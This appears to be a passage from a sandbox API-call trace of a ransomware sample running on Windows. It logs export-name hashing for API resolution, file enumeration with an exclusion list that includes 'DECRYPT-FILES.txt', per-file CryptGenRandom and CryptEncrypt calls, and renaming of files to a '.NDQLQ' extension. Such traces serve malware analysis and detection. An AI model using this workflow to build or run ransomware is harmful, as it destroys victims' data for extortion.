[0085.271] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.271] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.271] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.271] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.271] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.271] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.271] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.271] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.271] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.271] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.271] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.271] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.271] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.271] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.271] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.271] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.271] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\i32QS.wav") returned 45 [0085.271] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\i32QS.wav.NDQLQ") returned 51 [0085.271] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\i32QS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i32qs.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\i32QS.wav.NDQLQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i32qs.wav.ndqlq"), dwFlags=0x0) returned 1 [0085.272] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.272] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.272] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.273] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5ce480, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaefec200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaefec200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0085.273] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0085.273] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0085.273] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0085.273] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0085.273] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0085.273] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0085.273] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0085.273] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0085.273] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0085.273] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0085.273] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.273] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0085.273] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0085.273] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0085.273] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0085.273] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 36 [0085.273] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.273] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0085.273] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jkbimi8.tmp" [0085.273] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.273] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.274] CloseHandle (hObject=0x0) returned 0 [0085.274] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.274] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6b9a910, ftCreationTime.dwHighDateTime=0x1d4d208, ftLastAccessTime.dwLowDateTime=0x73d7d550, ftLastAccessTime.dwHighDateTime=0x1d4cc7d, ftLastWriteTime.dwLowDateTime=0x73d7d550, ftLastWriteTime.dwHighDateTime=0x1d4cc7d, nFileSizeHigh=0x0, nFileSizeLow=0x12825, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k_FSFKeTr9.m4a", cAlternateFileName="K_FSFK~1.M4A")) returned 1 [0085.274] lstrcmpiW (lpString1="k_FSFKeTr9.m4a", lpString2="DECRYPT-FILES.txt") returned 1 [0085.274] lstrcmpiW (lpString1="k_FSFKeTr9.m4a", lpString2="autorun.inf") returned 1 [0085.274] lstrcmpiW (lpString1="k_FSFKeTr9.m4a", lpString2="boot.ini") returned 1 [0085.274] lstrcmpiW (lpString1="k_FSFKeTr9.m4a", lpString2="desktop.ini") returned 1 [0085.274] lstrcmpiW (lpString1="k_FSFKeTr9.m4a", lpString2="ntuser.dat") returned -1 [0085.274] lstrcmpiW (lpString1="k_FSFKeTr9.m4a", lpString2="iconcache.db") returned 1 [0085.274] lstrcmpiW (lpString1="k_FSFKeTr9.m4a", lpString2="bootsect.bak") returned 1 [0085.274] lstrcmpiW (lpString1="k_FSFKeTr9.m4a", lpString2="ntuser.dat.log") returned -1 [0085.274] lstrcmpiW (lpString1="k_FSFKeTr9.m4a", lpString2="thumbs.db") returned -1 [0085.274] lstrcmpiW (lpString1="k_FSFKeTr9.m4a", lpString2="Bootfont.bin") returned 1 [0085.274] lstrlenW (lpString="k_FSFKeTr9.m4a") returned 14 [0085.274] lstrcmpiW (lpString1="m4a", lpString2="lnk") returned 1 [0085.274] lstrcmpiW (lpString1="m4a", lpString2="exe") returned 1 [0085.274] lstrcmpiW (lpString1="m4a", lpString2="sys") returned -1 [0085.274] lstrcmpiW (lpString1="m4a", lpString2="dll") returned 1 [0085.274] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 36 [0085.274] lstrlenW (lpString="k_FSFKeTr9.m4a") returned 14 [0085.274] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0085.274] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="k_FSFKeTr9.m4a" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k_FSFKeTr9.m4a") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k_FSFKeTr9.m4a" [0085.274] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.275] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k_FSFKeTr9.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k_fsfketr9.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0085.275] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=75813) returned 1 [0085.275] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0085.275] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.275] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.275] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.275] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.276] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0085.276] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0085.277] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.277] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.278] CloseHandle (hObject=0x414) returned 1 [0085.278] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.278] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0085.279] CloseHandle (hObject=0x0) returned 0 [0085.279] CloseHandle (hObject=0x410) returned 1 [0085.279] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.279] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.280] GetTickCount () returned 0x114dc6b [0085.280] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.280] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.280] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.280] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.280] lstrlenA (lpString="kernel32.dll") returned 12 [0085.281] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.281] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.281] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.281] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.281] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.281] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.281] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.281] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.281] lstrlenA (lpString="ADDATOMA") returned 8 [0085.281] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.281] lstrlenA (lpString="ADDATOMW") returned 8 [0085.281] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.281] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.281] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.281] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.281] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.281] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.281] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.281] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.281] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.281] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.281] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.281] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.281] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.281] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.281] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.281] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.281] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.281] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.281] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.282] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.282] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.282] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.282] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.282] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.282] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.282] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.282] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.282] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.282] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.282] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.282] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.282] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.282] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.282] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.282] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.282] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.282] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.282] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.282] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.282] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.282] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.282] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.282] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.282] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.282] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.282] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.282] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.282] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.282] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.282] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.282] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.282] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.283] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.283] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.283] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.283] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.283] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.283] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.283] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.283] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.283] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.283] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.283] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.283] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.283] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.283] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.283] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.283] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.283] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.283] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.283] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.283] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.283] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.283] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.283] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.283] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.283] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.283] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.283] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.283] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.283] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.283] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.283] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.283] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.283] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.283] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.283] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.283] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.284] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.284] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.284] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.284] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.284] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.284] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.284] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.284] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.284] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.284] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.284] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.284] lstrlenA (lpString="BEEP") returned 4 [0085.284] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.284] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.284] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.284] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.284] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.284] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.284] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.284] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.284] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.284] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.284] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.284] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.284] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.284] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.284] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.284] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.284] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.284] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.284] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.284] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.284] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.284] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.284] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" 